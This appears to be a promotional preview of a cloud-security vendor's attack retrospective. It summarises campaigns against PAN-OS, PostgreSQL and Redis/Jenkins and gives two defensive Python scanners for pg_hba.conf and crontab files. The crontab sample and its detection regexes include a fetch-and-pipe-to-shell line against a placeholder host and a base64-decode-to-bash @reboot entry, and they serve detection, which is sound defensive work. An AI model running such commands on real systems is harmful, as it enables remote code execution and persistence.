Cloud Attacks Retrospective: Evolving Tactics, Familiar Entry Points

Let's break down eight attack patterns security teams should be watching in 2025.


Cloud environments are growing more complex—but attackers aren’t necessarily getting more advanced. Instead, they’re applying creativity to familiar weaknesses: misconfigurations, unpatched systems, and credential misuse. 

That’s the key theme in Wiz’s newly released Cloud Attack Retrospective: 8 Common Threats to Watch for in 2025, a data-driven analysis of real-world cloud attacks based on detections across thousands of environments. The report maps eight of the most frequently observed MITRE ATT&CK techniques to specific threat campaigns, CVEs, and persistent trends across the cloud ecosystem. 

Here’s a preview of what stood out: 


Following the disclosure of CVE-2024-0012 and CVE-2024-9474 in PAN-OS, Wiz observed attackers deploying web shells and Sliver implants just days after PoCs went public. 

  • 24% of monitored environments contained vulnerable PAN-OS appliances 

  • 7% were internet-facing and exploitable via unauthenticated RCE 

These cases show how quickly attackers pivot from disclosure to exploitation—especially when edge infrastructure is exposed. 

The CPU_HU campaign targeted weak PostgreSQL configurations, exploiting default or guessable credentials to deploy cryptominers.

  • 90% of cloud environments analyzed use self-managed PostgreSQL 

  • Nearly one-third had at least one instance exposed publicly 

This underscores how foundational hardening steps—like restricting access and enforcing credential policies—remain critical. 
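One concrete hardening check for the PostgreSQL exposure described above is to audit `pg_hba.conf` for rules that accept connections from any address or that use authentication methods which require no credential (`trust`) or send it in cleartext (`password`). The following is an added example written for this article, not code from Wiz or from the report; the configuration it scans is a constructed sample, and the severity labels are the example's own convention.

```python
"""Audit pg_hba.conf rules for public exposure and weak authentication.

Added example (not part of the report): flags host rules that match every
client address and rules whose method skips or weakens authentication.
"""
import ipaddress

# Constructed sample configuration; not taken from any real environment.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER      ADDRESS         METHOD
local   all       all                       peer
host    all       all       127.0.0.1/32    scram-sha-256
host    all       all       0.0.0.0/0       trust
host    all       all       0.0.0.0/0       md5
host    all       postgres  10.0.0.0/8      password
hostssl all       all       ::/0            scram-sha-256
"""

# 'trust' performs no authentication at all; 'password' sends it in cleartext.
WEAK_METHODS = {"trust", "password"}


def parse_pg_hba(text):
    """Return a list of rule dicts. Handles the CIDR address form only; the
    separate-netmask form (e.g. '0.0.0.0 0.0.0.0') is not parsed."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blanks
        if not line:
            continue
        fields = line.split()
        if fields[0] == "local":  # Unix-socket rules carry no address column
            if len(fields) < 4:
                continue
            address, method = None, fields[3]
        else:
            if len(fields) < 5:
                continue
            address, method = fields[3], fields[4]
        rules.append({"line": lineno, "type": fields[0], "database": fields[1],
                      "user": fields[2], "address": address, "method": method})
    return rules


def is_any_source(address):
    """True for rules that match every client: 0.0.0.0/0, ::/0 or 'all'."""
    if address is None:
        return False
    if address == "all":
        return True
    try:
        return ipaddress.ip_network(address, strict=False).prefixlen == 0
    except ValueError:
        return False  # hostnames, samehost/samenet: not treated as any-source


def audit_pg_hba(text):
    """Return findings as (line, severity, issues) tuples, in file order."""
    findings = []
    for rule in parse_pg_hba(text):
        issues = []
        if is_any_source(rule["address"]):
            issues.append("any-source")
        if rule["method"] in WEAK_METHODS:
            issues.append("weak-auth:" + rule["method"])
        if not issues:
            continue
        if len(issues) == 2:
            severity = "critical"  # reachable from anywhere with no real auth
        elif "any-source" in issues:
            severity = "high"      # reachable from anywhere; auth still required
        else:
            severity = "medium"    # weak auth, but source-restricted
        findings.append((rule["line"], severity, issues))
    return findings


if __name__ == "__main__":
    for line, severity, issues in audit_pg_hba(SAMPLE_PG_HBA):
        print(f"line {line}: {severity}: {', '.join(issues)}")
```

Run it against an exported `pg_hba.conf`; a `critical` finding is the combination the campaign above relies on, and even a `high` finding on a strong method still means the database is reachable for brute-force attempts from the whole internet unless a network control sits in front of it.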

Phishing remains the top cause of identity-based cloud breaches. 

  • 0ktapus used spoofed SSO portals to harvest credentials 

  • Atlas Lion employed adversary-in-the-middle proxies and smishing to bypass MFA 

Even with modern defenses, user-targeted phishing continues to yield high success rates in cloud environments. 

Persistence is no longer an afterthought—it’s embedded from the start.

  • In Redis and Jenkins environments, attackers used cron jobs to relaunch cryptominers on reboot 

  • Selenium Grid instances without authentication were abused to execute payloads via browser automation 

Simple, resilient techniques continue to evade detection—especially when deployed on services with limited monitoring. 
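Because the cron persistence described above is so simple, it is also cheap to look for. The following added example (written for this article, not code from Wiz or the report) scans crontab content for indicators a defender would expect from a miner relaunch: `@reboot` schedules, commands that fetch a remote script and pipe it to a shell, inline `base64 -d`, and binaries run from world-writable or hidden paths. The crontab it scans is a constructed sample using a reserved `.invalid` domain.

```python
"""Scan crontab content for persistence indicators.

Added example (not from the report): heuristics to run over exported
crontabs such as /etc/crontab, /etc/cron.d/* and per-user spool files.
"""
import re

# Constructed sample crontab; the URL uses the reserved .invalid TLD.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh
@reboot /tmp/.x/kthreadd
* * * * * curl -fsSL http://example.invalid/a.sh | sh
@reboot echo aGVsbG8= | base64 -d | bash
"""

# Indicator name -> regex matched against the command part of a job entry.
INDICATORS = {
    "fetch-and-exec": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "base64-decode": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    "world-writable-dir": re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/"),
    "hidden-path": re.compile(r"/\.[^/\s]+"),
}
ENV_ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_crontab(text):
    """Yield (line_no, schedule, command) for each job entry, skipping
    comments, blank lines and environment assignments."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGN.match(line):
            continue
        if line.startswith("@"):  # @reboot, @daily, ... followed by command
            parts = line.split(None, 1)
        else:                     # five time fields followed by command
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            parts = [" ".join(fields[:5]), fields[5]]
        if len(parts) == 2:
            yield lineno, parts[0], parts[1]


def audit_crontab(text):
    """Return one finding dict per job entry that trips any indicator."""
    findings = []
    for lineno, schedule, command in parse_crontab(text):
        hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
        if schedule == "@reboot":
            hits.insert(0, "reboot-persistence")
        if hits:
            findings.append({"line": lineno, "schedule": schedule,
                             "command": command, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']} [{f['schedule']}] {', '.join(f['indicators'])}: {f['command']}")
```

Each indicator on its own has benign uses, so treat the output as triage input rather than an alert: an `@reboot` entry pointing into `/tmp` or a dot-directory is far more interesting than `@reboot` alone, and the combination is what the Redis and Jenkins cases above look like on disk.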

What’s inside the full report? 

The Cloud Attack Retrospective: 8 Common Threats to Watch for in 2025 includes: 

  • Detailed analysis of the top MITRE ATT&CK techniques abused by actors in the cloud 

  • Real-world incidents tied to specific CVEs, misconfigurations, and IAM abuse 

  • Campaigns involving Diicot, Bapak, 0ktapus, and more 

  • Practical guidance on how to detect and disrupt attack chains in your environment
